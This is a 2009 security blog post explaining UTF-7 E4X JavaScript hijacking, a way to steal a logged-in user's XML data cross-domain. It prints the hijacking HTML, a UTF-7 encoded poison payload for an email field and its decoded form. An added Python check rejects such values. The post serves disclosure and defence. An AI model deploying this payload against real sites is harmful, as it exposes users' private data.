Inline UTF-7 E4X javascript hijacking

Author: Gareth Heyes (@hackvertor)

Published: Tue, 24 Feb 2009 11:27:19 GMT

Updated: Sat, 22 Mar 2025 15:38:12 GMT

I finally get to talk about this because Yosuke Hasegawa has already disclosed the IE/FF variant with JSON data. I also discovered the UTF-7 JSON hacking independently, but I wasn't aware it was public so I didn't blog about it. Just in case you haven't, you should check out his presentation; it's awesome!

Anyway, onto E4X. I just love it :) Currently it is only fully supported by Firefox, and maybe Google Chrome, I think. It enables you to use XML data within JavaScript and has plenty of little quirks I've blogged about in the past. I won't go into detail about what it is; you'll have to Google around for that.

So you can use XML data within JavaScript. That means we can access that data cross-domain, but only if it's been assigned to a variable, right? Well, not exactly. You see, if we can control any aspect of the XML data, we can poison it with UTF-7 encoded data, and this means we can access inline XML without any variable assignment.

Let's take a sample of fictional data that is returned when you're logged on to a web site:-

<pre lang="XML">
<friendList>
  <friend>
    <name>Name1</name>
    <email>somebody@somewhere1.com</email>
  </friend>
  <friend>
    <name>Name2</name>
    <email>somebody@somewhere2.com</email>
  </friend>
  etc...
</friendList>
</pre>

So if you can control a new friend within the XML data, we can get the contents of the data remotely by including the data with a SCRIPT tag that specifies a UTF-7 charset. Here is how the attack would work:-

<pre lang="HTML">
<script defer="defer" charset="UTF-7" src="http://somesite.com/home/friendslist.php"></script>
<script>
window.onload = function() {
    alert(x);
}
</script>
</pre>

And we add a new friend called Poison with the following data:-

<pre lang="XML">
<friend>
  <name>Poison</name>
  <email>+ADwALwBlAG0AYQBpAGwAPgA8AC8AZgByAGkAZQBuAGQAPgA8AC8AZgByAGkAZQBuAGQATABpAHMAdAA+ADsAeAA9ADwAZgByAGkAZQBuAGQATABpAHMAdAA+ADwAZgByAGkAZQBuAGQAPgA8AGUAbQBhAGkAbAA+-</email>
</friend>
</pre>

If we decode the above UTF-7 string, we get the following:-

<pre lang="XML">
</email></friend></friendList>;x=<friendList><friend><email>
</pre>

Notice the "x" assignment; this is how we steal the data. We close the email, friend and friendList tags within the UTF-7 encoded data and start a new E4X block. A PoC is available here, which would also work cross-domain:-

E4X poc
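As an added example (not part of the original post or its PoC), here is a server-side input check in Python that reproduces what a browser told to read the response as UTF-7 would make of a user-supplied field, and rejects values whose reinterpretation introduces markup. The only input taken from the post is the Poison email; the other friend records and the `user+tag@example.com` address are constructed, the latter to show that a bare `+` on its own is not a reason to reject.

```python
# Added example: flag field values that become markup when the whole response
# is re-decoded as UTF-7 (the charset override used in the post). This is a
# second line of defence; the first is serving the XML with an explicit
# charset in the Content-Type header, which the script element's charset
# attribute does not override.
# The Poison email below is the one from the post; other samples are constructed.

MARKUP_CHARS = frozenset("<>;=")   # enough to close tags and start an E4X assignment


def utf7_view(value: str) -> str:
    """Text a UTF-7 decoder produces from the bytes this field is stored as.

    Fields are stored as UTF-8/ASCII; the attack works because the client
    re-decodes those same bytes as UTF-7, where '+...-' runs carry base64
    encoded UTF-16. Malformed runs become U+FFFD instead of raising, so a
    broken run cannot be used to dodge the check.
    """
    return value.encode("utf-8").decode("utf-7", errors="replace")


def introduced_markup(value: str) -> frozenset:
    """Markup characters that appear only after UTF-7 reinterpretation."""
    return (frozenset(utf7_view(value)) & MARKUP_CHARS) - frozenset(value)


def is_safe_field(value: str) -> bool:
    """True when re-decoding as UTF-7 cannot smuggle tags or an assignment."""
    return not introduced_markup(value)


# Poison email from the post (the only value taken from it).
POISON_EMAIL = "+ADwALwBlAG0AYQBpAGwAPgA8AC8AZgByAGkAZQBuAGQAPgA8AC8AZgByAGkAZQBuAGQATABpAHMAdAA+ADsAeAA9ADwAZgByAGkAZQBuAGQATABpAHMAdAA+ADwAZgByAGkAZQBuAGQAPgA8AGUAbQBhAGkAbAA+-"

# Constructed friend records mirroring the post's friendList layout.
SAMPLE_FRIENDS = [
    {"name": "Name1", "email": "somebody@somewhere1.com"},
    {"name": "Name2", "email": "user+tag@example.com"},   # legitimate '+' address
    {"name": "Poison", "email": POISON_EMAIL},
]


def rejected_friends(friends) -> list:
    """Names of records that fail the check on any field."""
    return [f["name"] for f in friends
            if not all(is_safe_field(v) for v in f.values())]


if __name__ == "__main__":
    print(repr(utf7_view(POISON_EMAIL)))
    print(rejected_friends(SAMPLE_FRIENDS))
```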
